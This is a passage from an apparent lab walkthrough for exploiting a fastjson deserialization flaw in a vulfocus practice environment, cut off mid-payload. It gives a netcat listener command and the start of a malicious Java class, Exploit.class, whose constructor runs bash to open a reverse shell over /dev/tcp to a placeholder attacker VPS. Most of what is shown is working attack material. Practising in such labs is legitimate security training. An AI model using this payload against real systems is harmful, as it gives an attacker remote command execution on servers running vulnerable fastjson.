1. Log in to vulfocus and start the fastjson environment
2. Server configuration
2.1 Open the port listener
nc -lvvp 1888
2.2 Host the malicious Java program
First, write the malicious exploit and name it Exploit.class, where x.x.x.x is the VPS address and 1888 is the LDAP listening port
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/1888;cat <&5 | while read line; do $line 2>&5 >&5;